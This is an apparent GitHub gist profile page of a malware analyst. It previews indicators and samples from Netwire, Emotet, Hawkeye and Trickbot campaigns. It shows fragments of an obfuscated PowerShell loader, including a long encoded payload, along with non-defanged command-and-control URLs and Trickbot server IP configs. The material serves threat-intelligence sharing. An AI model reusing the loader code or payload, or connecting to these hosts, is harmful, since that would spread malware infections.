Skip to content

Instantly share code, notes, and snippets.

Avatar

Herbie Zimmerman bloomer1016

View GitHub Profile
@bloomer1016
bloomer1016 / gist:8f7f8cd71c1da5c8ce19b5ea6c8c7e4c
Created May 28, 2020
2020-05-27 Netwire PoSH script deobfuscated
View gist:8f7f8cd71c1da5c8ce19b5ea6c8c7e4c
$scriptPath = split-path -parent $MyInvocation.MyCommand.Definition
function poaia (
$source,
$destination
)
{
Convert-StringToBinary -InputString $source -FilePath $Destination;
# }
@bloomer1016
bloomer1016 / 2020-05-27-netwire-PoSH-script
Last active May 28, 2020
2020-05-27 Netwire PoSH script obfuscated
View 2020-05-27-netwire-PoSH-script
function DWCGZSSCOP([String] $DLFKTBYFDD, [String] $DQIMDWFDFC)
{
$ZPJZBWXZGI = "gXO0iD6V2ljQbtqtk61/mI3ZPQNygsdAqn5sMbtIyQWvSNJ++R/vdPhgWi0NT31Wf5w2cjsPbQ1uCJgW4gOp10tbsoCsqXJprJPY69Gn08rEFLSkIfF24pxM28/lXNvdYsJCqw1Te8FS9vcEPvg+rZU6btiwSAP6RGRv3dtxs2c0sIm5iV1KrdzGy0gGMy6fROFXzA5qZtxiJ+Plb8y0LLQv92OUEhgpY4WuoGL/AyQh34/Jo+FqltNu89OEx5NNS2QOjMiZp+Q9an6gIBeW5tbyj1QKXGf68mvR6U3crSZSjIp6rP5b5m669nPcLjkSIIo0s+niQm5dt9Y9RZAL1BIZ+8aONhTiL2X/QZkaJV3Ni+Bu5Hk2RaboaPKMUXxDarxHBHRGcIzQxdQEcCEEZQ7gtYbEvrxXc2Svp7yhtpfcFKmLHygPwcS9pcVCqwcPG0TafW8hLeMR4zJKTbSo2qfJ1CsQCzkbBPkqDxkZfITtN+Zw8aKg6v+9k1+9R5ADXy6hB6C0pbaWEOZCVieGZQpNjSZ7xk9wHYPEXwZMZWZxrSsiUmrHE0DvCvOk6pHEKsiMIX333DkJeWutu3SmmD83ewXsmyYaJDYpDtLuNUNm4Jze3YcIKU3T7eTgAkfqszBW744VIJwhKQqzAvW332RqG2JgLt/YJB8qgaD8X1z1m9DYOkCP9OMZgH3SHUNk09MpgaTBVzb2NpkSlSwScVsKzQCRf10rEbQyVcKco/yzmIVAVSK60LYRGHen8qdJrdbiK4E4DULiACuBTmkGyoiPPkB7AHJEPfLGJi2qPyj0lZ4NDGLrvuRQoI6L3NcIgTV6YVPNGysQT45Pyj28EVs3ZvVpLU/37SlrN1MkAvCaCK82tvvpg13tFCILouRB2JaYK+N4k4+dvo+jSR8gfwHYN58muntPUqUrcuoSY6LDzTq
View gist:abe4fc57310117da6703d49123f94757
http://lineward.net/?4xkey7=UAQDY1AKYKCVV1QHIANQIGG0CQi
http://runwithhunt.com/?6Fi7=i7(w5t8z.6].42170QIGYQYNCA3LUw
http://safiyaansari.com/?8o=mPUCmPTOCT0QIGYQYNCA3LUw
http://srt4dart.net/?56a8h=mABOJDAGUAQPTU0QIGYQYNCA3LUw
http://runwithhunt.com/?1WYEQ8=HQEGURNXQHIANQIGG0CQi
http://srt4dart.us/?22U=YCYCMDFOiH0QIGYQYNCA3LUw
http://charlesmessa.net/?6I01VO=CRUvFO0QIGYQYNCA3LUw
http://charlesmessa.net/?34S2d=QI/?TmPVV.45104160QIGYQYNCA3LUw
http://torktuned.com/?3AVOaV=QETtUy0DFOQzNYQHIANQIGG0CQi
http://regpharmconsult.com/?3pev13=APYBBOGWIRmAVYQHIANQIGG0CQi
View gist:476c6c6ab71f47d65e881c22f1dd62e4
Maldocs:
========
MD5 (F_P298298.doc) = e298770f693d152d37693eb855dde9e9
MD5 (F_T4545.doc) = 64e55a68e11af98e1ce319d0dd433de8
Artifacts:
MD5 (42.exe) = d0474a3558d7be310d72bf3146cb59d5 --> https://www.virustotal.com/#/file/48fedd8eb8fd95b1c3f3a43fe0ed4ff6e769902b1b7db1f07953455b5ff2c662/detection
MD5 (srvloada.exe) = d0474a3558d7be310d72bf3146cb59d5 --> https://www.virustotal.com/#/file/48fedd8eb8fd95b1c3f3a43fe0ed4ff6e769902b1b7db1f07953455b5ff2c662/detection
Malicious macro script:
@bloomer1016
bloomer1016 / gist:e205b0129c2367ff446ba6b2a6d77a60
Created Aug 24, 2018
2018-08-24: Hawkeye malspam process details
View gist:e205b0129c2367ff446ba6b2a6d77a60
This file has been truncated, but you can view the full file.
Strings2 v1.3
Copyright © 2016, Geoff McDonald
http://www.split-code.com/
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
\??\C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
en-US
M/d/yyyy
@bloomer1016
bloomer1016 / gist:41badea3223a9e41b71d5720b0f618b5
Created Jul 10, 2018
2018-07-10 Emotet - Subject: Invoice related
View gist:41badea3223a9e41b71d5720b0f618b5
Valid URLs:
===========
hxxp://mjcapt[.]com/newsletter/US/ACCOUNT/Please-pull-invoice-44130/
hxxp://www[.]anadolu-yapi[.]xyz/pdf/US/Order/Order-22324681075/
hxxp://www[.]friendsengg[.]co[.]in/files/En_us/STATUS/Invoice-07-10-18/
hxxp://www[.]desabiangkeke[.]com/doc/EN_en/INVOICE-STATUS/Invoice-18660/
hxxp://www[.]nasa[.]ekpaideusi[.]gr/newsletter/US/DOC/Invoice-3243324682-07-10-2018/
hxxp://www[.]elizimuhendislik[.]xyz/doc/EN_en/Statement/Invoice-7384991949-07-10-2018/
hxxp://www[.]docudabra[.]com/newsletter/En/ACCOUNT/Pay-Invoice/
hxxp://test[.]foskinterior[.]com/Jul2018/En_us/ACCOUNT/Invoice-14693880736-07-09-2018/
View gist:e7873b265b241459e219f7dc83c2e8d3
MD5 of "invoice_<random number string>.doc: 916F1A229B73D5720AA51E596BE52EE5
Count of unique URLs in all the sample of emails:
-------------------------------------------------
8 dudz.biz
7 golfdudz.biz
5 golfdudz.com
4 johnstontrav.com
5 kickasstrophe.org
3 mmmfrecklespbctw.com
View gist:4f9e402c407c4526ab69559308139061
Any.Run:
========
https://app.any.run/tasks/e3551e19-4898-4dc7-b646-cf50c50e1fac
https://app.any.run/tasks/cb544ffd-5c07-4470-a618-33117882059f
VT:
===
https://www.virustotal.com/#/file/91d0f65b0e9f62ccb7817030967cde51c8f4806a8acec6deabec39c7d8adb416/community
https://www.virustotal.com/#/file/ece2a89aa4bdb318370bc75458d7d790791d7b46287888d40b555e3b7726b228/community
@bloomer1016
bloomer1016 / gist:2d2e1b676c95c916bff6ecadbe5510af
Created Jun 5, 2018
2018-06-05 Trickbot Config (ver 1000206 / gtag ser0605)
View gist:2d2e1b676c95c916bff6ecadbe5510af
<mcconf>
<ver>1000206</ver>
<gtag>ser0605</gtag>
<servs>
<srv>93.109.242.134:443</srv>
<srv>46.47.50.44:443</srv>
<srv>190.7.199.42:443</srv>
<srv>158.58.131.54:443</srv>
View gist:a628315d67865ab95b4b52bc36b5798e
2017-12-06
==========
<mcconf>
<ver>1000098</ver>
<gtag>ser0512</gtag>
<servs>
<srv>79.106.41.9:449</srv>
<srv>94.250.252.146:443</srv>
<srv>62.109.18.206:443</srv>
<srv>62.109.26.193:443</srv>
You can’t perform that action at this time.